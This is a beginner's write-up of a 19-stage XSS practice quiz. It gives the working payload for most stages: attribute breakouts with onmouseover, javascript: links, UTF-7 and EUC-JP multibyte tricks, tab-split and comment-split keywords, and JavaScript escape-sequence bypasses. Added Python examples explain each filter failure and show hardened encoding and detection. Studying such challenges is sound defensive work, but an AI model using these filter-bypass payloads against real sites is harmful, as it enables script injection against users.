Working through the XSS quiz: process and impressions

Source: Internet
Author: User

XSS Quiz

I only learned XSS recently, so this is a beginner's understanding; if there are mistakes, please point them out.

Question 1

At first I used Chrome and could not get the first question to work. Then it occurred to me to use IE; I opened IE11 and it succeeded.

<script>alert(document.domain);</script>

Question 2

For the second question, the payload above does not work directly.

View the source code.

Construct a string that closes off the <input ...> on the left:

"><script>alert(document.domain);</script><"

Question 3

First just search for something random.

Construct:

"</b></form><script>alert(document.domain);</script><form><b>"

Doesn't work.

Clearly it filters angle brackets and quotes: < > " are escaped to &lt; &gt; &quot; respectively.

I tried jother. Doesn't work either.

Searching online, I found another way to avoid < > ": Unicode encoding

< \u003c

> \u003e

" \u0022

Doesn't work.

Try Base64 next.

data:text/html;base64,ijwvyj48l2zvcm0+phnjcmlwdd5hbgvydchkb2n1bwvudc5kb21haw4pozwvc2nyaxb0pjxmcm9tpjxipii=

data:text/html;base64,pgltzybzcmm9ecbvbmvycm9ypwfszxj0kgrvy3vtzw50lmrvbwfpbik+

That doesn't seem to work either. I give up.

Not quite. The hint says: "hint: the input in the text box is properly escaped."

The answer online says: "But the input point is not just this place."

So I typed this into the F12 console:

alert(document.domain)

A window pops up. I don't know what that proves; that's not the point.

What does "the input point is not only here" mean? Try the tool WebScarab:

Intercept the request and modify it: after Japan, append

<script>alert(document.domain);</script>

The window pops up successfully.

In Firefox's Firebug, modifying the page directly also works. I don't know what the point of this quiz question is.

Question 4

Found this: an extra hidden input.

I changed it to type=text and entered the following directly:

"><input type="text" value="

Successful pop-up.

Question 5

I didn't notice anything at first; there is no filtering. Then I suddenly found a length limit of 15 characters.

Change the 15 directly to 999, then fill in the payload and the window pops up.

You can also use WebScarab to intercept the POST request and modify it, which bypasses the 15-character limit. Successful pop-up.

Reading the online answer afterwards, it also seems to use proxy interception.

Question 6

This time, just enter something. It turns out <> are escaped to &lt;&gt;

Try the earlier trick, Unicode encoding. It doesn't seem to work.

Then it occurred to me that with this payload no angle brackets are needed at all:

"onmouseover=alert(document.domain) align="left

The window pops up successfully.

The answer is basically the same.

Question 7

At first glance there is no length limit this time and no filtering. Looking carefully, the symbols & < > " ' are escaped:

&amp; &lt; &gt; &quot; &#39;

First try the earlier Unicode and base64 tricks. No luck.

Then test:

"><"

Look at the hint: "hint: nearly the same ... but a bit more tricky."

I almost forgot the method from question 6; only the quotation marks are unavailable.

Then I suddenly noticed that the value of the input has no quotation marks at all. Who needs quotation marks!

123 onmouseover=alert(document.domain)

Mouse over, and the window pops up.

It seems the source code has to be read carefully.
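Questions 6 and 7 show the two halves of attribute-context output encoding failing separately: in question 6 the value is quoted but only < > are escaped, so a " in the input closes the attribute; in question 7 the characters & < > " ' are all escaped but the value is unquoted, so a space in the input starts a new attribute. The Python below is an added example written for these notes, not code from the quiz or from the original post. It renders the two payloads above through templates shaped like each stage (the template markup and the p1 field name are assumptions), renders them through a hardened template that quotes the value and escapes all five characters, and uses the standard library's html.parser to report whether the input ended up as its own on* attribute, which is the check to automate rather than eyeballing the string.

```python
import html
from html.parser import HTMLParser

# Constructed sample inputs: the two payloads from questions 6 and 7 above.
STAGE6_INPUT = '"onmouseover=alert(document.domain) align="left'
STAGE7_INPUT = '123 onmouseover=alert(document.domain)'


def escape_angle_brackets_only(value):
    """Question 6 style filter: only < and > are turned into entities."""
    return value.replace("<", "&lt;").replace(">", "&gt;")


def render_quoted_partial_escape(user_value):
    """Question 6 style (assumed template): the attribute is quoted, but a " in the input still closes it."""
    return f'<input type="text" name="p1" value="{escape_angle_brackets_only(user_value)}">'


def render_unquoted_full_escape(user_value):
    """Question 7 style (assumed template): & < > " ' are escaped, but the value is unquoted,
    so whitespace in the input starts a new attribute."""
    return f'<input type="text" name="p1" value={html.escape(user_value)}>'


def render_hardened(user_value):
    """Both fixes at once: quote the attribute and escape & < > " ' (html.escape does all five by default)."""
    return f'<input type="text" name="p1" value="{html.escape(user_value)}">'


class _AttrCollector(HTMLParser):
    """Collects (tag, attribute name) pairs exactly as the parser tokenises the markup."""

    def __init__(self):
        super().__init__()
        self.attrs = []

    def handle_starttag(self, tag, attrs):
        self.attrs.extend((tag, name) for name, _ in attrs)


def event_handler_attrs(markup):
    """Return the on* attributes the parser sees; any hit means user input broke out of the value."""
    collector = _AttrCollector()
    collector.feed(markup)
    collector.close()
    return [(tag, name) for tag, name in collector.attrs if name.startswith("on")]


if __name__ == "__main__":
    for label, markup in [
        ("question 6 style", render_quoted_partial_escape(STAGE6_INPUT)),
        ("question 7 style", render_unquoted_full_escape(STAGE7_INPUT)),
        ("hardened, question 6 input", render_hardened(STAGE6_INPUT)),
        ("hardened, question 7 input", render_hardened(STAGE7_INPUT)),
    ]:
        print(f"{label}: {markup}")
        print(f"  event handler attributes seen by the parser: {event_handler_attrs(markup)}")
```

The parser-based check matters because a filter author looking at the question 7 output sees no < > " ' and concludes it is safe; the tokeniser shows that `value=123 onmouseover=...` is two attributes. The hardened template is safe for both inputs because the only delimiter that can end a double-quoted attribute is ", and html.escape never emits one.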

Question 8

This time the search box has become "make a link". Sure enough, entering an address generates the same link below.

So is it the visible reflected type?

But testing shows that quotes and angle brackets are filtered.

"onclick=alert(document.domain) align="left

That doesn't work.

I couldn't help looking at the answer, and instantly understood: insert the code directly into the src; my thinking was incomplete.

javascript:alert(document.domain)

That works.

Question 9

Look at the code: another hidden input.

Hint: UTF-7 XSS

UTF-7: a Mail-Safe Transformation Format of Unicode (RFC 1642). This is an encoding that represents Unicode code points using 7-bit ASCII. It was designed to pass through mail gateways that can only carry 7-bit data. UTF-7 shows English letters, numbers and common symbols directly, while other characters are encoded with a modified Base64. The + and - signs mark the start and end of an encoded run. So if garbled text contains English words accompanied by + and - signs, it may be UTF-7.

Nputn Link.ver=alert(document.domain) Never mind, first play with it in Firebug:

I see that this hidden input has name="charset", value="EUC-JP".

EUC-JP is an encoding for Japanese.

Researching the answers:

+ACI-onmouseover=+ACI-alert(document.domain)+ADsAIg-x=+ACI-

UTF-7

Actual test: + is URL-encoded as %2B

p1=1%2BACI-onmouseover=%2BACI-alert(document.domain)%2BADsAIg-x=%2BACI-&charset=EUC-JP

Then I noticed a comment under another answer:

Only IE still supports UTF-7, so do it in IE.

I had been using Firefox for half a day. Back to IE.

Too bad it doesn't work in IE either? What's going on?
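The question 9 trick works because the response's character set comes from a request field (the hidden charset input), so a filter that escapes & < > " ' sees nothing in +ACI-, while a browser decoding the page as UTF-7 sees a double quote. The Python below is an added example for these notes, not code from the quiz or the post. It decodes the payload above (base64 case restored, since UTF-7 shift sequences are case-sensitive) both as the filter sees it and as a UTF-7 browser would, includes a small detection helper for inputs whose UTF-7 decoding hides HTML metacharacters, and pins the declared output charset to an allowlist. The ALLOWED_CHARSETS set and the hypothetical application behind response_charset are assumptions.

```python
import html

# Constructed sample: the question 9 payload with its base64 case restored.
# In UTF-7, +ACI- is U+0022 (") and +ADsAIg- is U+003B U+0022 (;").
UTF7_PAYLOAD = '+ACI-onmouseover=+ACI-alert(document.domain)+ADsAIg-x=+ACI-'

# Charsets the (hypothetical) application is willing to declare; anything else falls back to UTF-8.
ALLOWED_CHARSETS = {"utf-8"}


def escaped_view(text):
    """What an HTML-escaping filter sees: the ASCII text contains none of & < > \" '."""
    return html.escape(text)


def browser_view(text, charset):
    """What a browser renders once it decodes the response bytes under the given charset."""
    return text.encode("ascii").decode(charset)


def utf7_hidden_metachars(text):
    """Detection aid: HTML metacharacters that appear only after UTF-7 decoding.
    Returns an empty set for text that is not valid UTF-7 or hides nothing."""
    try:
        decoded = text.encode("ascii").decode("utf-7")
    except (UnicodeEncodeError, UnicodeDecodeError):
        return set()
    return {c for c in decoded if c in '&<>"\''} - set(text)


def response_charset(requested):
    """Pin the output charset: a request-supplied value (such as the hidden charset field)
    is honoured only if it is on the allowlist; otherwise UTF-8 is declared."""
    requested = (requested or "").strip().lower()
    return requested if requested in ALLOWED_CHARSETS else "utf-8"


def content_type_header(requested):
    """Content-Type header value to emit; the charset is always explicit."""
    return f"text/html; charset={response_charset(requested)}"


if __name__ == "__main__":
    print("filter sees :", escaped_view(UTF7_PAYLOAD))
    print("as UTF-8    :", browser_view(UTF7_PAYLOAD, "utf-8"))
    print("as UTF-7    :", browser_view(UTF7_PAYLOAD, "utf-7"))
    print("hidden      :", utf7_hidden_metachars(UTF7_PAYLOAD))
    for requested in ("EUC-JP", "UTF-7", "utf-8"):
        print(f"requested {requested!r:9} -> {content_type_header(requested)}")
```

Declaring the charset explicitly in the Content-Type header (and in a meta tag) removes the browser's reason to guess; the detection helper is only a triage aid for logs, since the real fix is to never let the request pick the response encoding.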

Question 10

This time <> " are not filtered.

Using the usual trick:

"onmouseover=alert(document.domain) align="left

No pop-up. Looking at the code, it turns out the word domain was filtered out.

I'm afraid I'll have to read the code.

Sure enough, there's a hidden input at the top:

<input type="hidden" name="key" value="Tubhf22ui/qiq">

What on earth is this?

After a long while, I couldn't help looking at the answer; it's really ingenious:

"onmouseover=alert(document.domdomainain);x="

domain is filtered out once, and the two halves on either side join back into domain.

With great respect.

"Ametoxbug

Question 11

This time nothing seems to be filtered. I don't know what the trick is.

Straight to the payload: "onmouseover=alert(document.domdomainain);x="

Oh no, my onmouseover turned into xxx, instead of being deleted like in the previous round.

So the previous round's method doesn't work here.

One more try:

"><"

Damn, that is filtered too.

I guess script will be filtered as well:

Sure enough, the <script></script> has been deleted.

The hint this time: "s/script/xscript/ig;" and "s/on[a-z]+=/onxxx=/ig;" and "s/style=/stxxx=/ig;"

src="javascript....

So it becomes javaxscript.

Look at the answer: use &#09; (\t) to split up the word script.

With "><a href="javascr&#09;ipt:alert(document.domain);">12</a>

Clicking the link in Firefox directly opens a new window.

In IE, though, it does pop the window. Shall I move on?
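The question 11 hint describes a keyword blacklist (s/script/xscript/ig and friends) applied to the raw text, and the &#09; trick gets past it because the entity is not a tab until the browser decodes the attribute, after which the URL parser drops the tab and sees javascript:. The Python below is an added example for these notes, not the quiz's or the post's code: it reproduces the three rewrite rules from the hint as regexes, derives the scheme the way a browser would (entity-decode, strip C0 controls and space from both ends, remove tab/CR/LF anywhere, then parse), and replaces the blacklist with a scheme allowlist. ALLOWED_SCHEMES and the sample hrefs are assumptions.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed sample: the question 11 href value as it sits in the HTML, entity still encoded.
TAB_SPLIT_HREF = 'javascr&#09;ipt:alert(document.domain);'

# URL Standard: strip C0 controls and space (U+0000..U+0020) from both ends,
# then remove ASCII tab, LF and CR wherever they occur. Recent Python versions do the
# same inside urlsplit; it is spelled out here so the rule is visible.
_C0_AND_SPACE = "".join(chr(c) for c in range(0x21))
_TAB_OR_NEWLINE = re.compile(r"[\t\n\r]")

ALLOWED_SCHEMES = {"", "http", "https"}   # "" means a relative URL (assumed policy)


def blacklist_rewrite(value):
    """The three rewrite rules from the question 11 hint, as Python regexes. They run on the raw,
    still entity-encoded text, so 'javascr&#09;ipt' never matches 'script'."""
    value = re.sub(r"script", "xscript", value, flags=re.IGNORECASE)
    value = re.sub(r"on[a-z]+=", "onxxx=", value, flags=re.IGNORECASE)
    value = re.sub(r"style=", "stxxx=", value, flags=re.IGNORECASE)
    return value


def naive_scheme(attr_value):
    """What a validator sees if it parses the raw attribute text: the entity breaks the scheme token."""
    return urlsplit(attr_value).scheme.lower()


def browser_scheme(attr_value):
    """Scheme a browser actually resolves: entity-decode the attribute (the step where &#09;
    becomes a real tab), apply the URL Standard stripping rules, then parse."""
    url = html.unescape(attr_value)
    url = url.strip(_C0_AND_SPACE)
    url = _TAB_OR_NEWLINE.sub("", url)
    return urlsplit(url).scheme.lower()


def is_safe_href(attr_value):
    """Allowlist check on the scheme the browser will use, instead of a keyword blacklist."""
    return browser_scheme(attr_value) in ALLOWED_SCHEMES


if __name__ == "__main__":
    for candidate in (TAB_SPLIT_HREF, "  JavaScript:alert(1)", "https://example.com/path?q=1", "/search?p1=test"):
        print(f"{candidate!r}")
        print(f"  after blacklist : {blacklist_rewrite(candidate)!r}")
        print(f"  naive scheme    : {naive_scheme(candidate)!r}")
        print(f"  browser scheme  : {browser_scheme(candidate)!r}")
        print(f"  allowed         : {is_safe_href(candidate)}")
```

The same normalise-then-allowlist order applies to any validator: decode the value the way the consumer (here the HTML parser, then the URL parser) will, and only then decide. Checking the raw bytes against a word list is what the hint's rules do, and the tab variant is one of many spellings they miss.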

Question 12

This time the value has no quotation marks. However, spaces are filtered, and angle brackets and quotation marks simply disappear.

The answer is:

`onmouseover=alert(document.domain);

Two single quotes at the start. But it still doesn't work in Firefox; IE works.

No, it isn't a single quotation mark but the key below Esc (`), ASCII code 0x60, called the backtick.

The answer writes:

Right? %00 null characters, %20 spaces, angle brackets, single quotes and double quotes are all filtered to nothing. You can use the backtick (`) or tab in place of the one above. Works in IE; not in Firefox or Chrome.

I'm impressed.

Question 13

A background colour question; unfortunately it filters my quotation marks.

I basically don't understand style, expression, CSS and so on. Look straight at the answer.

One answer online writes:

background-color:#f00;background:url("javascript:alert(document.domain);");

That is not a successful approach.

Another answer writes:

Use expression in CSS styles to implement the JavaScript onmouseover/onmouseout events:

aa:expression(onmouseover=function(){alert(document.domain)})

That doesn't seem to work either.

I give up.

Use Firebug to pop the window first.

PS: when I started using an IE8-core browser for question 14, I came back to this one:

Both of them pop the window.

Question 14

Another style question. First look at the hint: s/(url|script|eval|expression)/xxx/ig;

Is this an upgraded version? I tried: these four words all become xxx, so the method from the previous question cannot be used.

Look at the answer again:

cos:expres/**/sion(if(!window.x){alert(document.domain);window.x=1;})

It seems an empty comment is inserted inside the word to get past the check.

I can't pop the window with IE11 or Firefox. It could be a browser problem (with so many problems), so I brought out a classic browser with an IE8 core (not an advertisement); pressing F12 all the time to switch the engine is too cumbersome. This time the window pops. So I decided to use it from now on.

Question 15

This is JavaScript, using document.write.

First try the payload:

alert(document.domain);alert("

Discovered that < > " are escaped.

Use escaped ASCII codes:

In hexadecimal, < is 0x3c and > is 0x3e

\x3cscript\x3ealert(document.domain);\x3c/script\x3e

Found that a single \ is unsuccessful. Use this:

\\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e

Successful pop-up.

PS:

A little experiment with a local HTML file:

<script>
document.write("<script>alert(3)</script>");
</script>

Cannot pop the window (the </script> inside the string literal ends the outer script element).

<script>
document.write("\x3cscript\x3ealert(3)\x3c/script\x3e");
</script>

Escaped like this, the window pops. (Chrome)

Question 16

At a glance it looks like question 15, but the hint adds a sentence.

Hint: "document.write();" and "s/\\x/\\\\x/ig;"

So is this a 16-in-one?

\x is rewritten to \\x, and \\x to \\\x; whatever I put in, one more backslash is added in front of the x.

Try decimal, octal, whatever.

The decimal codes of < > are 60 and 62.

\60script\62alert(document.domain);\60/script\62

The \ is still filtered. Change to two again:

\\60script\\62alert(document.domain);\\60/script\\62

Still no. \\6 disappears altogether.

Try Unicode, referring to the earlier table:

< \u003c

> \u003e

" \u0022

\\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e

OK.
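Questions 15 and 16 both inject into a JavaScript string literal handed to document.write: HTML-escaping < > " does nothing in that context, and the question 16 rule s/\\x/\\\\x/ig only neutralises hex escapes, leaving \u escapes (the solution above) and legacy octal escapes (in JavaScript, \74 is < and \76 is >) untouched. The Python below is an added example written for these notes, not code from the quiz or the post. It implements a small decoder for the escape forms a JS engine resolves inside a string literal, runs the question 15/16 payloads through filters shaped like the hints (reconstructions, not the quiz's code), and shows the hardened encoding for this context: every character outside [A-Za-z0-9] becomes \uHHHH, so a user-supplied backslash is itself encoded and can never begin an escape.

```python
import re

# Constructed samples: the question 15/16 payloads from these notes, plus an octal variant.
HEX_PAYLOAD = r'\x3cscript\x3ealert(document.domain);\x3c/script\x3e'
UNICODE_PAYLOAD = r'\u003cscript\u003ealert(document.domain);\u003c/script\u003e'
OCTAL_PAYLOAD = r'\74script\76alert(document.domain);\74/script\76'   # octal 74 = '<', 76 = '>'

# One escape sequence as a JS string literal parser sees it: \xHH, \uHHHH, legacy octal \NNN, or \<char>.
_JS_ESCAPE = re.compile(r'\\(x[0-9A-Fa-f]{2}|u[0-9A-Fa-f]{4}|[0-7]{1,3}|.)', re.DOTALL)
_SIMPLE = {"n": "\n", "t": "\t", "r": "\r", "b": "\b", "f": "\f", "v": "\v"}


def js_string_decode(literal):
    """Resolve the escapes inside a JS string literal; the result is the text document.write receives."""
    def repl(match):
        esc = match.group(1)
        if esc[0] == "x" and len(esc) == 3:
            return chr(int(esc[1:], 16))
        if esc[0] == "u" and len(esc) == 5:
            return chr(int(esc[1:], 16))
        if esc[0] in "01234567":
            return chr(int(esc, 8))
        return _SIMPLE.get(esc, esc)      # \\ -> \, \" -> ", any other \c -> c
    return _JS_ESCAPE.sub(repl, literal)


def stage15_style_filter(value):
    """Question 15 style: HTML-escape < > " only. Inside a <script> string this changes nothing about escapes."""
    return value.replace("<", "&lt;").replace(">", "&gt;").replace('"', "&quot;")


def stage16_style_filter(value):
    """Question 16 style: the question 15 filter plus the hint's s/\\x/\\\\x/ig rule.
    \\u and octal escapes are untouched."""
    return re.sub(r"\\x", r"\\\\x", stage15_style_filter(value))


def _u_escape(code_point):
    """\\uHHHH for BMP characters, a surrogate pair for anything above U+FFFF."""
    if code_point > 0xFFFF:
        code_point -= 0x10000
        return f"\\u{0xD800 + (code_point >> 10):04x}\\u{0xDC00 + (code_point & 0x3FF):04x}"
    return f"\\u{code_point:04x}"


def js_string_encode(value):
    """Hardened output encoding for a JS string context: everything outside [A-Za-z0-9] is \\u-escaped,
    so no user-supplied backslash, quote, slash or angle bracket reaches the JS parser as itself."""
    return "".join(c if c.isascii() and c.isalnum() else _u_escape(ord(c)) for c in value)


if __name__ == "__main__":
    for name, payload in (("hex", HEX_PAYLOAD), ("unicode", UNICODE_PAYLOAD), ("octal", OCTAL_PAYLOAD)):
        filtered = stage16_style_filter(payload)
        print(f"{name:8} after q16 filter: {filtered}")
        print(f"{'':8} browser sees    : {js_string_decode(filtered)}")
    encoded = js_string_encode(UNICODE_PAYLOAD)
    print("hardened encoding:", encoded)
    print("browser sees     :", js_string_decode(encoded))
```

The hardened encoder produces only [A-Za-z0-9] and \uHHHH sequences, so the string the browser sees after decoding is exactly the user's text, with any backslash or angle bracket in it staying a literal character rather than forming markup; that is the property the stage 16 backslash-doubling rule tries and fails to get by blacklisting one escape form.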

Question 17

This question has two boxes.

Looking at the answer, this problem seems more complex, involving Japanese encoding, and newer versions of IE have fixed it.

Hint: Multi-Byte Character

EUC-JP encoding ranges:

Byte 1 is 8E: 2-byte encoding, byte 2 in the range A1-DF

Byte 1 is A1-FE: 2-byte encoding, byte 2 in the range A1-FE

Byte 1 is 8F: 3-byte encoding, bytes 2 and 3 in the range A1-FE

Both form fields are submitted with %a7 to swallow the trailing double quote. Viewing the source code it looks successful, so why didn't it succeed in the UI? Helplessly, I typed into the address bar: javascript:alert(document.domain);

Now I found that it's a browser version problem; don't use IE8 for this one.

p1=1%a7&p2=+onmouseover%3dalert%28document.domain%29%3b+%a7

Skip it altogether.

Question 18

Same problem.

Skip.

Question 19

This question has no input box, only a link to itself.

What to do? Enter it straight into the console. (Or enter javascript:alert(document.domain) in the address bar.)

All stages cleared.
